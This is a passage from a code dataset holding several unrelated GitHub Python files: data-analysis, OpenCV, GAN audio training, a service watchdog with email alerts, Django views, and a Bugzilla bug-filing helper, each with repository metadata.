dpi=300)\n\n\ndef get_files(dir_path):\n fileslist = []\n if not os.path.isdir(dir_path):\n return [dir_path]\n allfiles = os.listdir(dir_path)\n for f in allfiles:\n if f.endswith('.csv'):\n fileslist.append(os.path.join(dir_path, f))\n return fileslist\n\n\ndef get_files_recursively(dir_path):\n files = []\n for r, d, f in os.walk(dir_path):\n for file in f:\n if file.endswith('.csv'):\n files.append(os.path.join(r, file))\n return files\n\n\ndef outlier_differences(diffs):\n data_diffs = diffs.split(',')\n for i in range(len(data_diffs)):\n for j in range(i+1, len(data_diffs)):\n d1 = data_diffs[i]\n d2 = data_diffs[j]\n df1 = pd.read_csv(d1)\n df2 = pd.read_csv(d2)\n diff = df1.shape[0] - list(np.array(df1['is_anomaly'].tolist()) - np.array(df2['is_anomaly'].tolist())).count(0)\n print(os.path.splitext(os.path.basename(d1))[0], os.path.splitext(os.path.basename(d2))[0], diff)\n\n\ndef print_datasets_statistics(datadir):\n print('Dataset', '#samples', '#features', '#outliers', '%outlier ratio')\n for f in get_files_recursively(datadir):\n df = pd.read_csv(f)\n outliers = df[df[is_anomaly_column] == 1].shape[0]\n outlier_ratio = round(outliers / df.shape[0], 2)\n features = df.shape[1] - 1\n samples = df.shape[0]\n dataset_name = os.path.splitext(os.path.basename(f))[0]\n print(dataset_name, samples, features, outliers, outlier_ratio)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('-tocsv', '--arfftocsv', help='Arff dataset path to convert to csv', default=None)\n parser.add_argument('-viz', '--visualise', help='Dataset or Dataset folder to visualize.', default=None)\n parser.add_argument('-sv', '--saveviz', help='Directory to save the image.', default=None)\n parser.add_argument('-diff', '--differences', default=None, help='-datadiff d1,d2,d3', type=str)\n parser.add_argument('-sub', '--subspace', default=None, help='e.g. [2,3]')\n parser.add_argument('-pstats', '--print_stats', default=None, help='-pstats ')\n args = parser.parse_args()\n if args.arfftocsv is not None:\n arff_to_csv(args.arfftocsv)\n elif args.subspace is not None:\n plot_2d_subspace(args.visualise, args.subspace)\n elif args.visualise is not None:\n tsne_visualizer(args.visualise, args.saveviz)\n elif args.differences is not None:\n outlier_differences(args.differences)\n elif args.print_stats is not None:\n print_datasets_statistics(args.print_stats)\n\n","repo_name":"myrtakis/MxM","sub_path":"PredictiveOutlierExplanationBenchmark/dataset_analysis.py","file_name":"dataset_analysis.py","file_ext":"py","file_size_in_byte":5308,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"98"} +{"seq_id":"15399744242","text":"#\n# @lc app=leetcode id=113 lang=python3\n#\n# [113] Path Sum II\n#\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution:\n def pathSum(self, root: TreeNode, sum_: int) -> List[List[int]]:\n if not root: return []\n queue = [(root, [root.val])]\n paths =[]\n while queue:\n node, path = queue.pop()\n if node.left:\n queue.append((node.left, path+[node.left.val]))\n if node.right:\n queue.append((node.right, path+[node.right.val]))\n if not node.left and not node.right:\n if sum_==sum(path):\n paths.append(path)\n return paths\n\n\n","repo_name":"mdasadul/leetcode","sub_path":"113.path-sum-ii.py","file_name":"113.path-sum-ii.py","file_ext":"py","file_size_in_byte":787,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"98"} +{"seq_id":"21157347614","text":"import cv2\r\nfrom matplotlib import pyplot\r\n\r\nori_img = cv2.imread(\"ikigaipng.png\")\r\nhsv_ori = cv2.cvtColor(ori_img, cv2.COLOR_BGR2HSV)\r\n\r\nroi = cv2.imread(\"Ofkikai.png\")\r\nhsv_roi = cv2.cvtColor(ori_img, cv2.COLOR_BGR2HSV)\r\n\r\nhue, saturation, value = cv2.split(hsv_roi)\r\n\r\n# histogram_roi\r\nroi_hist = cv2.calcHist([hsv_roi], [0, 1], None, [180, 256], [0, 180, 0, 256])\r\nmask = cv2.calcBackProject([hsv_ori], [0, 1], roi_hist, [0, 180, 0, 256], 1)\r\n\r\n# filtering remove noise\r\n#kernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE, (5, 5))\r\n#mask = cv2.filter2D(mask, -1, kernel)\r\n#_, mask = cv2.threshold(mask, 100, 255, cv2.THRESH_BINARY)\r\n\r\n#mask = cv2.merge((mask, mask, mask))\r\n#result = cv2.bitwise_and(ori_img, mask)\r\n\r\ncv2.imshow(\"Mask\", mask)\r\ncv2.imshow(\"Original image\", ori_img)\r\n#cv2.imshow(\"Result\", result)\r\ncv2.imshow(\"roi\", roi)\r\ncv2.waitKey(0)\r\ncv2.destroyAllWindows()\r\n","repo_name":"AditiBarnwal/opencv_project","sub_path":"histogram_ndBackprojection.py","file_name":"histogram_ndBackprojection.py","file_ext":"py","file_size_in_byte":886,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"98"} +{"seq_id":"9179286048","text":"import time\nimport sys\nimport os\nimport argparse\n\n# File for making an importable function, that when called, ie. when in the new\n# file executed with an arg -t, will copy the contents of the file to a new file\n# wrapped around a time function.\n\ndef timer():\n\n def get_args():\n parser = argparse.ArgumentParser(description='Read a file with time tracking')\n parser.add_argument('-t', '--timeit', action='store_true', help='Time the file')\n args = parser.parse_args()\n return args\n\n def get_current_file():\n return sys.argv[0]\n\n def read_file(file):\n with open(file, 'r') as f:\n lines = f.readlines()\n lines = [line for line in lines if not line.startswith('timer()')] # Not today recursion!\n lines = [line for line in lines if not line.startswith('from timer import timer')]\n return lines\n\n def time_file(file):\n lines = read_file(file)\n with open('time_' + file, 'w') as f:\n f.write('import time \\n')\n f.write('start = time.time() \\n')\n for line in lines:\n f.write(line)\n f.write('\\nend = time.time()')\n f.write('\\nprint(\"Total time:\",round(end - start,5))')\n\n def execute_file(file):\n os.system('python3 ' + file)\n\n def delete_file(file):\n os.remove(file)\n\n if get_args().timeit:\n time_file(get_current_file())\n execute_file('time_' + get_current_file())\n delete_file('time_' + get_current_file())\n sys.exit(0)","repo_name":"avocardio/timer","sub_path":"timer.py","file_name":"timer.py","file_ext":"py","file_size_in_byte":1541,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"98"} +{"seq_id":"37899458383","text":"import numpy as np\r\nimport tensorflow as tf\r\nfrom tensorflow import keras\r\nfrom tensorflow.keras import layers\r\nimport os\r\nimport tensorflow as tf\r\nimport keras\r\nimport pandas as pd\r\nimport numpy as np\r\nfrom tensorflow.keras.layers import Conv2D,Dense,Conv2DTranspose\r\nfrom tensorflow.python.keras.models import Model\r\nfrom tensorflow.keras import layers\r\nimport matplotlib.pyplot as plt\r\nimport tensorflow.keras.backend as K\r\nfrom keras.callbacks import ModelCheckpoint, TensorBoard\r\nimport time\r\nimport tensorflow.keras as tk\r\nimport tensorflow_addons as tfa\r\nfrom biosppy.signals import tools as tools\r\nimport neural_structured_learning as nsl\r\nfrom scipy import stats\r\nfrom biosppy.signals import tools as tools\r\nimport neural_structured_learning as nsl\r\nfrom scipy import stats\r\nimport sklearn.preprocessing as skp\r\nimport neural_structured_learning as nsl\r\nfrom sklearn.utils import shuffle\r\nfrom scipy import signal\r\nimport json\r\nimport librosa\r\nimport tensorflow_io as tfio\r\nfrom pydub import AudioSegment\r\nfrom loss import *\r\n\r\n\r\nkernel = 16\r\nstride= 4\r\ndef filter_ecg(signal, sampling_rate):\r\n \r\n signal = np.array(signal)\r\n order = int(0.3 * sampling_rate)\r\n filtered, _, _ = tools.filter_signal(signal=signal,\r\n ftype='FIR',\r\n band='bandpass',\r\n order=order,\r\n frequency=[3, 45],\r\n sampling_rate=sampling_rate)\r\n return filtered\r\n \r\n \r\ndef preprocess(path):\r\n \r\n file_list = os.listdir(path)\r\n \r\n file_json = sorted([file for file in file_list if file.endswith(\".json\")])\r\n file_mp3 = sorted([file for file in file_list if file.endswith(\".wav\")])\r\n \r\n print(len(file_mp3))\r\n\r\n lens=24000\r\n \r\n data_clone = np.zeros((1,131072))\r\n data = np.zeros((lens,131072))\r\n \r\n q=0\r\n data_label = np.zeros_like(data)\r\n for s,i in enumerate(range(len(file_json[:lens]))):\r\n\r\n\r\n\r\n a = AudioSegment.from_file(\"{}{}\".format(path,file_mp3[i]),format = 'wav')\r\n y = np.array(a.get_array_of_samples())\r\n\r\n if len(y)<131072:\r\n continue\r\n elif q==24000:\r\n break\r\n else:\r\n print('q',q)\r\n q+=1 \r\n y =y[:131072]\r\n\r\n \r\n print(s)\r\n\r\n data[i]=y\r\n data_label[i] = y+np.max(y)*0.5\r\n \r\n\r\n data = np.expand_dims(data,axis=-1) \r\n data_label = np.expand_dims(data_label,axis=-1)\r\n\r\n\r\n\r\n print(data.shape)\r\n return data, data_label\r\n \r\n \r\ndef train_step(input_image, target, epoch,generator,discriminator,generator_optimizer,discriminator_optimizer,s,p):\r\n with tf.GradientTape() as gen_tape, tf.GradientTape() as disc_tape:\r\n gen_output = generator(input_image, training=True)\r\n \r\n disc_real_output = discriminator([input_image,target], training=True)\r\n disc_generated_output = discriminator([input_image,gen_output], training=True)\r\n \r\n gen_total_loss, gen_gan_loss, gen_l1_loss = generator_loss(disc_generated_output, gen_output, target,p)\r\n disc_loss = discriminator_loss(disc_real_output, disc_generated_output)\r\n \r\n \r\n generator_gradients = gen_tape.gradient(gen_total_loss,\r\n generator.trainable_variables)\r\n discriminator_gradients = disc_tape.gradient(disc_loss,\r\n discriminator.trainable_variables)\r\n \r\n generator_optimizer.apply_gradients(zip(generator_gradients,\r\n generator.trainable_variables))\r\n discriminator_optimizer.apply_gradients(zip(discriminator_gradients,\r\n discriminator.trainable_variables))\r\n \r\n \r\n print('epoch {} gen_total_loss {} gen_gan_loss {} gen_l1_loss {}'.format(s,gen_total_loss,gen_gan_loss,gen_l1_loss))\r\n\r\n\r\ndef onelead_model():\r\n initializer = tf.random_normal_initializer(0., 0.02)\r\n time_len = 131072\r\n\r\n encoder_inputs=keras.Input(shape=(time_len,1),name='data')\r\n \r\n x=tf.keras.layers.Conv1D(64, (kernel), strides=(stride), padding='same',kernel_initializer=initializer, use_bias=False)(encoder_inputs)#8\r\n x_0=tf.keras.layers.Activation('LeakyReLU')(x)\r\n \r\n x=tf.keras.layers.Conv1D(128, (kernel), strides=(stride), padding='same',kernel_initializer=initializer, use_bias=False)(x_0)#4\r\n x=tf.keras.layers.BatchNormalization()(x)\r\n x_1=tf.keras.layers.Activation('LeakyReLU')(x)\r\n \r\n x=tf.keras.layers.Conv1D(256, (kernel), strides=(stride), padding='same',kernel_initializer=initializer, use_bias=False)(x_1)#2\r\n x=tf.keras.layers.BatchNormalization()(x)\r\n x_2 =tf.keras.layers.Activation('LeakyReLU')(x)\r\n \r\n \r\n x=tf.keras.layers.Conv1D(512, (kernel), strides=(stride), padding='same',kernel_initializer=initializer, use_bias=False)(x_2)#2\r\n x=tf.keras.layers.BatchNormalization()(x)\r\n x_3=tf.keras.layers.Activation('LeakyReLU')(x)\r\n \r\n \r\n x=tf.keras.layers.Conv1D(1024, (kernel), strides=(stride), padding='same',kernel_initializer=initializer, use_bias=False)(x_3)#2\r\n x=tf.keras.layers.BatchNormalization()(x)\r\n x_4=tf.keras.layers.Activation('LeakyReLU')(x)\r\n \r\n\r\n \r\n x=tf.keras.layers.Conv1DTranspose(512, (kernel), strides=(stride),padding='same',kernel_initializer=initializer,use_bias=False)(x_4)\r\n x=tf.keras.layers.BatchNormalization()(x)\r\n x=tf.keras.layers.Activation('relu')(x)\r\n \r\n \r\n x=tf.keras.layers.Concatenate()([x,x_3])\r\n x=tf.keras.layers.Conv1DTranspose(256, (kernel), strides=(stride),padding='same',kernel_initializer=initializer,use_bias=False)(x)\r\n x=tf.keras.layers.BatchNormalization()(x)\r\n x=tf.keras.layers.Activation('relu')(x)\r\n \r\n \r\n x=tf.keras.layers.Concatenate()([x,x_2])\r\n x=tf.keras.layers.Conv1DTranspose(128, (kernel), strides=(stride),padding='same',kernel_initializer=initializer,use_bias=False)(x)\r\n x=tf.keras.layers.BatchNormalization()(x)\r\n x=tf.keras.layers.Activation('relu')(x)\r\n \r\n x=tf.keras.layers.Concatenate()([x,x_1])\r\n x=tf.keras.layers.Conv1DTranspose(64, (kernel), strides=(stride),padding='same',kernel_initializer=initializer,use_bias=False)(x)\r\n x=tf.keras.layers.BatchNormalization()(x)\r\n x=tf.keras.layers.Activation('relu')(x)\r\n \r\n x=tf.keras.layers.Concatenate()([x,x_0])\r\n encoder_outputs = layers.Conv1DTranspose(1, (kernel), strides=(stride), padding=\"same\",kernel_initializer=initializer, use_bias=False)(x)\r\n\r\n return keras.Model(encoder_inputs,encoder_outputs)\r\n \r\n\r\ndef train_(train,train_label,p,path):\r\n \r\n epochs=10\r\n time_len = 131072\r\n batch_size = 32\r\n initializer = tf.random_normal_initializer(0., 0.02)\r\n \r\n\r\n encoder_inputs=keras.Input(shape=(time_len,1),name='data')\r\n \r\n x=tf.keras.layers.Conv1D(64, (kernel), strides=(stride), padding='same',kernel_initializer=initializer, use_bias=False)(encoder_inputs)#8\r\n x_0=tf.keras.layers.Activation('LeakyReLU')(x)\r\n \r\n x=tf.keras.layers.Conv1D(128, (kernel), strides=(stride), padding='same',kernel_initializer=initializer, use_bias=False)(x_0)#4\r\n x=tf.keras.layers.BatchNormalization()(x)\r\n x_1=tf.keras.layers.Activation('LeakyReLU')(x)\r\n \r\n x=tf.keras.layers.Conv1D(256, (kernel), strides=(stride), padding='same',kernel_initializer=initializer, use_bias=False)(x_1)#2\r\n x=tf.keras.layers.BatchNormalization()(x)\r\n x_2 =tf.keras.layers.Activation('LeakyReLU')(x)\r\n \r\n \r\n x=tf.keras.layers.Conv1D(512, (kernel), strides=(stride), padding='same',kernel_initializer=initializer, use_bias=False)(x_2)#2\r\n x=tf.keras.layers.BatchNormalization()(x)\r\n x_3=tf.keras.layers.Activation('LeakyReLU')(x)\r\n \r\n \r\n x=tf.keras.layers.Conv1D(1024, (kernel), strides=(stride), padding='same',kernel_initializer=initializer, use_bias=False)(x_3)#2\r\n x=tf.keras.layers.BatchNormalization()(x)\r\n x_4=tf.keras.layers.Activation('LeakyReLU')(x)\r\n \r\n\r\n \r\n x=tf.keras.layers.Conv1DTranspose(512, (kernel), strides=(stride),padding='same',kernel_initializer=initializer,use_bias=False)(x_4)\r\n x=tf.keras.layers.BatchNormalization()(x)\r\n x=tf.keras.layers.Activation('relu')(x)\r\n \r\n \r\n x=tf.keras.layers.Concatenate()([x,x_3])\r\n x=tf.keras.layers.Conv1DTranspose(256, (kernel), strides=(stride),padding='same',kernel_initializer=initializer,use_bias=False)(x)\r\n x=tf.keras.layers.BatchNormalization()(x)\r\n x=tf.keras.layers.Activation('relu')(x)\r\n \r\n \r\n x=tf.keras.layers.Concatenate()([x,x_2])\r\n x=tf.keras.layers.Conv1DTranspose(128, (kernel), strides=(stride),padding='same',kernel_initializer=initializer,use_bias=False)(x)\r\n x=tf.keras.layers.BatchNormalization()(x)\r\n x=tf.keras.layers.Activation('relu')(x)\r\n \r\n x=tf.keras.layers.Concatenate()([x,x_1])\r\n x=tf.keras.layers.Conv1DTranspose(64, (kernel), strides=(stride),padding='same',kernel_initializer=initializer,use_bias=False)(x)\r\n x=tf.keras.layers.BatchNormalization()(x)\r\n x=tf.keras.layers.Activation('relu')(x)\r\n \r\n x=tf.keras.layers.Concatenate()([x,x_0])\r\n encoder_outputs = layers.Conv1DTranspose(1, (kernel), strides=(stride), padding=\"same\",kernel_initializer=initializer, use_bias=False)(x)\r\n\r\n \r\n \r\n generator=keras.Model(encoder_inputs,encoder_outputs)\r\n generator.summary()\r\n \r\n inp = tf.keras.layers.Input(shape=[time_len,1], name='input_image')\r\n tar = tf.keras.layers.Input(shape=[time_len,1], name='target_image')\r\n\r\n x = tf.keras.layers.concatenate([inp, tar])\r\n x = tf.keras.layers.Conv1D(64, (4), strides=(4),kernel_initializer=initializer,padding='same', use_bias=False)(x)\r\n x = tf.keras.layers.LeakyReLU()(x)\r\n x=tf.keras.layers.Conv1D(128, (4), strides=(4),kernel_initializer=initializer,padding='same', use_bias=False)(x)\r\n x=tf.keras.layers.BatchNormalization()(x)\r\n x = tf.keras.layers.LeakyReLU()(x)\r\n x=tf.keras.layers.Conv1D(256, (4), strides=(4),kernel_initializer=initializer,padding='same', use_bias=False)(x)\r\n x=tf.keras.layers.BatchNormalization()(x)\r\n x = tf.keras.layers.LeakyReLU()(x)\r\n x = tf.keras.layers.ZeroPadding1D()(x)\r\n conv = tf.keras.layers.Conv1D(512, (4), strides=(4),kernel_initializer=initializer,padding='same',use_bias=False)(x)\r\n batchnorm1=tf.keras.layers.BatchNormalization()(conv)\r\n \r\n leaky_relu = tf.keras.layers.LeakyReLU()(batchnorm1)\r\n zero_pad2 = tf.keras.layers.ZeroPadding1D()(leaky_relu)\r\n last = tf.keras.layers.Conv1D(1, (4), strides=(4),kernel_initializer=initializer,activation='sigmoid')(zero_pad2)\r\n \r\n \r\n discriminator=tf.keras.Model(inputs=[inp,tar], outputs=last)\r\n discriminator.summary()\r\n \r\n generator_optimizer = tf.keras.optimizers.Adam(MyLRSchedule(1e-4), beta_1=0.5)\r\n discriminator_optimizer = tf.keras.optimizers.Adam(MyLRSchedule(1e-4), beta_1=0.5)\r\n\r\n for epoch in range(epochs):\r\n \r\n print(\"Epoch: \", epoch)\r\n\r\n \r\n for i in range(int(len(train)/32)-1):\r\n tr=train[batch_size*i:batch_size*(i+1)]\r\n tr_label=train_label[batch_size*i:batch_size*(i+1)]\r\n train_step(tr, tr_label, epoch,generator,discriminator,generator_optimizer,discriminator_optimizer,epoch,p)\r\n\r\n if (epoch + 1) % 1 == 0:\r\n generator.save_weights(f'/home/jhjoo/voice/tf_hightone/generator{epoch+1}.h5')\r\n\r\nif __name__=='__main__':\r\n \r\n path = \"/home/jhjoo/voice_data/train_data/cc/60~69/Male/\"\r\n p = 50\r\n import os \r\n os.environ[\"CUDA_VISIBLE_DEVICES\"]='0'\r\n data, data_label = preprocess(path)\r\n train_(data,data_label,p,path) \r\n \r\n\r\n \r\n \r\n\r\n\r\n\r\n","repo_name":"joojinho97/time_frequency_domain_GAN","sub_path":"time_voice.py","file_name":"time_voice.py","file_ext":"py","file_size_in_byte":11666,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"98"} +{"seq_id":"40498907628","text":"import subprocess, logging, time, smtplib, ssl\nfrom email.mime.text import MIMEText\nfrom email.mime.multipart import MIMEMultipart\nfrom tracemalloc import stop\nimport environ\n\nenv = environ.Env()\nenviron.Env.read_env()\n\nlogging.basicConfig(\n filename='logger.log',\n # filemode='w',\n format='%(asctime)s - %(message)s',\n level=logging.INFO\n)\n\ndebug = env.int('DEBUG')\n\n#https://realpython.com/python-send-email/\n\ndef mail_to():\n recipiants = env.list('RECIPIANTS')\n smtp_server = env('SMTP_SERVER')\n sender_email = env('SENDER_EMAIL')\n port = env('PORT') # For SSL\n password = env('PASSWORD')\n exo_server = env('EXO_SERVER')\n\n message = MIMEMultipart(\"alternative\")\n message[\"Subject\"] = f'Automatisk omstart av {exo_server}'\n message[\"From\"] = sender_email\n message[\"To\"] = \", \".join(recipiants)\n\n # Create the plain-text and HTML version of your message\n text = \"\"\"\\\n Omstart har skett av {exo_server}.\"\"\"\n html = \"\"\"\\\n \n \n

Omstart har skett av {exo_server}.

\n \n \n \"\"\"\n\n # Turn these into plain/html MIMEText objects\n part1 = MIMEText(text, \"plain\")\n part2 = MIMEText(html, \"html\")\n\n # Add HTML/plain-text parts to MIMEMultipart message\n # The email client will try to render the last part first\n message.attach(part1)\n message.attach(part2)\n\n # Create a secure SSL context\n context = ssl.create_default_context()\n\n try:\n server = smtplib.SMTP(smtp_server,port)\n server.ehlo() # Can be omitted\n server.starttls(context=context) # Secure the connection\n server.ehlo() # Can be omitted\n server.login(sender_email, password)\n server.sendmail(sender_email, recipiants, message.as_string().format(exo_server=exo_server))\n logging.info('Sent e-mails responsible staff.')\n except Exception as e:\n # Print any error messages to stdout\n logging.info('Failed to send e-mails.')\n print(e)\n finally:\n server.quit() \n\n\ndef get_task_status(task_name):\n tasks = subprocess.check_output(f'tasklist /v /fi \"IMAGENAME eq {task_name}\"').decode('cp866', 'ignore').split(\"\\r\\n\")\n\n for task in tasks:\n if task_name in task:\n return False if 'Not Responding' in task else True\n \n return 0\n\n\ndef exo_handle(start=False):\n start_uri = env.path('EXO_START_URI')\n stop_uri = env.path('EXO_STOP_URI')\n\n name = 'Eo4Run' if start else 'EXOstop'\n uri = start_uri if start else stop_uri\n\n try:\n status = subprocess.Popen(uri)\n logging.info(f'Succesfully ran {name}.')\n return status\n except:\n logging.info(f'{name} failed to run.')\n return 0\n\n\nif __name__ == '__main__':\n logging.info('-----------------------------------------------------')\n logging.info('Checking for hung processes..')\n task_name = env.str('EXO_TASK_NAME')\n task = get_task_status(task_name)\n\n if task == 0:\n logging.info(f'Failed to find any running {task_name}.')\n elif task and debug == 0:\n logging.info(f'Task {task_name} is Running or Unknown, no action required.')\n else:\n logging.info(f'{task_name} is Not Responding, restarting services.')\n \n retry = 1\n # Trying to run Exostop 5 times before exiting script \n while retry <= 5:\n logging.info(f'Running EXOstop, try {retry} of 5.')\n stop_status = exo_handle()\n if stop_status == 0:\n retry += 1\n else:\n break\n \n # Trying to run Eo4Run if EXOstop was successful and Exo is not still running.\n if stop_status != 0:\n retry = 1\n while retry <= 5:\n time.sleep(10)\n logging.info(f'Starting service {task_name}, try {retry} of 5.')\n start_status = get_task_status(task_name)\n if start_status == 0:\n task = exo_handle(True)\n if task != 0:\n if debug == 0:\n mail_to()\n break\n else:\n retry += 1\n else:\n retry += 1\n else:\n logging.info(f'Failed to stop EXO service, closing down.')","repo_name":"VamasAB/script-exo-alive","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4339,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"98"} +{"seq_id":"23923256675","text":"from django.http import HttpResponse\n# Create your views here.\nfrom django.shortcuts import render, redirect\nfrom .models import Client\nfrom commande.filtre import CommandeFiltre\nfrom client.form import ClientForm\nfrom django.contrib.auth.decorators import login_required\n\n@login_required(login_url='acces')\ndef list_client(request, pk):\n client = Client.objects.get(id=pk)\n commandes = client.commande_set.all()\n commandes_total = commandes.count()\n myFilter = CommandeFiltre(request.GET, queryset=commandes)\n commandes = myFilter.qs\n context = {'client' : client,'commandes': commandes, 'commandes_total': commandes_total, 'myFilter': myFilter}\n return render(request, 'client/list_client.html', context)\n\n@login_required(login_url='acces')\ndef ajouter_client(request):\n form = ClientForm()\n if request.method == 'POST':\n form = ClientForm(request.POST)\n if form.is_valid():\n form.save()\n return redirect('/acceuil')\n context = {'form':form}\n return render(request, 'client/ajouter_client.html', context)\n\n\n@login_required(login_url='acces')\ndef modifier_client(request, pk):\n client = Client.objects.get(id=pk)\n form = ClientForm(instance=client)\n if request.method == 'POST':\n form = ClientForm(request.POST,instance=client)\n if form.is_valid():\n form.save()\n return redirect('/client' + '/' + pk)\n context = {'form':form}\n return render(request, 'client/ajouter_client.html', context)\n\n\n@login_required(login_url='acces')\ndef supprimer_client(request, pk):\n client = Client.objects.get(id=pk)\n if request.method == 'POST':\n client.delete()\n return redirect('/acceuil')\n context = {'client': client}\n return render(request,'client/supprimer_client.html', context)\n\n","repo_name":"moatazkrimchi/App-CRM-Django","sub_path":"client/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1816,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"98"} +{"seq_id":"28272402994","text":"\"\"\"\nThis script automates the process of filing bugs for tests skipped due to new\nor migrating platforms.\n\nIt requires a bit of setup to use:\n\n1. Ensure you can login via the bugzilla client. First add:\n\n [DEFAULT]\n url = https://bugzilla.mozilla.org\n\nto ~/.config/python-bugzilla/bugzillarc. Next generate a new API key from\nyour Bugzilla profile and paste it into the prompt you get from:\n\n $ bugzilla login --api-key`.\n\nIf you'd like to test the tool out, use `https://bugzilla.allizom.org` as the\nurl instead and request a test account from #bmo in slack.\n\n2. Set the `GECKO` environment variable to your mozilla-central clone.\n\n3. Craft the patch that disables tests. You can optionally use `{{bug}}` as a\nplaceholder for the bug id, or {{reason}} as a placeholder for the reason string.\nE.g:\n\n skip-if =\n os == \"linux\" && debug # {{bug}} - {{reason}}\n\n\n4. Export the patch to a file:\n\n $ hg export . > orig.patch\n\n5. Run the tool. You'll need to supply the patch file, a reason string and an\noptional try url. Also consider redirecting the output to a new file:\n\n $ ./test-triage-bug-filer path/to/orig.patch \"new platform triage for foo\" --try-url > new.patch\n\n6. Import the new patch and prune the old one:\n\n $ hg import new.patch\n $ hg prune -r \n\"\"\" # noqa: E501\n\n\nimport json\nimport os\nimport subprocess\nimport sys\nimport traceback\nfrom itertools import chain\n\nimport bugzilla\nfrom unidiff import PatchSet\n\nbzapi = bugzilla.Bugzilla(\"https://bugzilla.mozilla.org\")\n\nBUG_SUMMARY_TEMPLATE = \"Tests skipped in '{path}' for {reason}\"\nBUG_DESCRIPTION_TEMPLATE = \"\"\"\nNote: This bug was filed automatically [via script](https://hg.mozilla.org/build/braindump/file/tip/test-related/test-triage-bug-filer).\n\nThe following tests are being disabled in [{path}](https://searchfox.org/mozilla-central/source/{path}) due to {reason}:\n{skipped_tests}\n\nFull diff:\n```diff\n{diff}\n```\n{try_blurb}\n### Disclaimer\nAdding new platforms is not an exact science, and in order to get to green and\nenable coverage ASAP, we often err on the side of disabling when in doubt. For\nthis reason, it's possible that the annotation was added in error, is covered\nby an existing intermittent, or was fixed sometime between now and when the\nannotation was made.\n\nIf you believe this is the case here, please feel free to remove the\nannotation. Sorry for the inconvenience and thanks for understanding.\n\"\"\".lstrip() # noqa: E501\n\nTRY_BLURB_TEMPLATE = \"\"\"\n{try_url}\nTo run these failures in your own try push, first ensure the patches from bug {bug_id}\nhave landed, revert the `skip-if` annotations, then run:\n```bash\n$ ./mach try fuzzy --rebuild 3 {path}\n```\n\nFinally use the [fuzzy interface](https://firefox-source-docs.mozilla.org/tools/try/selectors/fuzzy.html) to select the task(s) which are relevant to the\n`skip-if` expression(s).\n\"\"\" # noqa: E501\n\nTRY_URL_TEMPLATE = \"\"\"\nSee this [try push]({try_url}) for failures. If failures are missing, they were\neither discovered on a subsequent try push or this bug is invalid.\n\"\"\"\n\n\ndef get_bug_components(paths):\n proc = subprocess.run(\n [\"mach\", \"file-info\", \"bugzilla-component\", \"--format=json\"] + paths,\n capture_output=True,\n text=True,\n check=True,\n cwd=os.environ[\"GECKO\"],\n )\n return json.loads(proc.stdout)\n\n\ndef get_skipped_tests(manifest):\n skipped_tests = set()\n for hunk in manifest:\n last_test = \"unknown\"\n last_key = None\n for line in hunk:\n if line.value.startswith(\"[\"):\n last_test = line.value.strip().strip(\"[]\")\n elif not line.value.startswith(\" \") and \"=\" in line.value:\n last_key = line.value[: line.value.index(\"=\")].strip()\n\n if not line.is_added or \"{bug}\" not in line.value:\n continue\n\n if last_key == \"skip-if\":\n skipped_tests.add(last_test)\n return skipped_tests\n\n\ndef create_bug(\n product,\n component,\n summary,\n description,\n depends_on,\n bugtype=\"task\",\n version=\"unspecified\",\n dry_run=False,\n **kwargs,\n):\n if dry_run:\n description = \" \" + \"\\n \".join(description.splitlines())\n print(\n f\"\"\"\nThe following bug would be filed:\n {summary}\n Product: {product}\n Component: {component}\n Depends on: {depends_on}\n Description:\n {description}\n\"\"\"\n )\n return\n\n createinfo = bzapi.build_createbug(\n product=product,\n component=component,\n summary=summary,\n description=description,\n version=version,\n depends_on=depends_on,\n )\n createinfo[\"type\"] = bugtype\n createinfo.update(kwargs)\n try:\n bug = bzapi.createbug(createinfo)\n print(bug.weburl, file=sys.stderr)\n return bug.id\n except Exception:\n print(\"Failed to create bug:\", file=sys.stderr)\n print(traceback.format_exc(), file=sys.stderr)\n\n\ndef process_diff(\n diff: str, reason: str, depends_on: str, try_url: str = \"\", dry_run: bool = False\n):\n if not bzapi.logged_in:\n bzapi.interactive_login()\n\n try_url = try_url or \"\"\n\n patch = PatchSet.from_filename(diff, encoding=\"utf-8\")\n components = get_bug_components([m.path for m in patch])\n\n for manifest in patch:\n if (\n not manifest.path.endswith(\".ini\")\n or \"testing/web-platform\" in manifest.path\n ):\n continue\n\n skipped_tests = get_skipped_tests(manifest)\n if not skipped_tests:\n continue\n\n product, component = components[manifest.path]\n summary = BUG_SUMMARY_TEMPLATE.format(path=manifest.path, reason=reason)\n\n skipped_tests_str = \"* \" + \"\\n* \".join(skipped_tests)\n if try_url:\n url = TRY_URL_TEMPLATE.format(\n try_url=f\"{try_url}&test_paths={manifest.path}\"\n )\n try_blurb = TRY_BLURB_TEMPLATE.format(\n path=manifest.path, try_url=url, bug_id=depends_on\n )\n description = BUG_DESCRIPTION_TEMPLATE.format(\n path=manifest.path,\n reason=reason,\n skipped_tests=skipped_tests_str,\n diff=str(manifest),\n try_blurb=try_blurb,\n )\n bug_id = create_bug(\n product, component, summary, description, depends_on, dry_run=dry_run\n )\n if not bug_id:\n continue\n\n for line in chain.from_iterable([hunk for hunk in manifest]):\n if line.is_added:\n line.value = line.value.replace(\"{bug}\", f\"Bug {bug_id}\")\n line.value = line.value.replace(\"{reason}\", reason)\n\n if not dry_run:\n print(patch)\n","repo_name":"Remi288/mozci-tools","sub_path":"citools/test_triage_bug_filer.py","file_name":"test_triage_bug_filer.py","file_ext":"py","file_size_in_byte":6699,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"98"} +{"seq_id":"15587976992","text":"import mvc_chess.models.turn as turn\nfrom mvc_chess.models.turn import Turn\n\n\nclass Tournament:\n states = {\n \"NOT_STARTED\": \"Not started\",\n \"IN_PROGRESS\": 